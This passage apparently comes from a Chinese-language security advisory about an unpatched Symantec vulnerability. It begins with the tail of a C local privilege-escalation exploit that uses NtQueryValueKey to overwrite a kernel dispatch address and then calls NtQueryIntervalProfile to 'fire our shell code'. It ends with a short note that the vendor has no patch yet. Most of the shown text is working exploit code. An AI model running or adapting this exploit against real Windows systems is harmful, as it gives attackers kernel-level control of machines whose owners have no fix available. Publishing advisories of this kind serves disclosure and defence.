UNICODE_STRING name ;
name.Buffer = NULL ;
name.Length = 0 ;
name.MaximumLength=0;
status = NtQueryValueKey(hkey , &name , 2 , pbuf , 100 , (PULONG)xHalQuerySystemInformationAddr );
//fire our shell code
pNtQueryIntervalProfile NtQueryIntervalProfile = (pNtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll" ) , "NtQueryIntervalProfile");
NtQueryIntervalProfile(ProfileTotalIssues , 0 );
return 0;
}
建议:
--------------------------------------------------------------------------------
厂商补丁:
Symantec
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: